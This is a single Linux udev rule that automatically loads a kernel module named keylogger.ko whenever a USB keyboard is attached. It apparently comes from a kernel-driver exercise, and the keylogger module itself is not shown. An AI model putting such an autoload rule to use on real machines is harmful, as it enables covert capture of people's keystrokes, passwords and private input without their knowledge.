ACTION=="add", SUBSYSTEMS=="usb", ATTRS{bInterfaceClass}=="03", ATTRS{bInterfaceProtocol}=="01", RUN+="/sbin/insmod /root/drivers_and_interrupts/keylogger.ko"
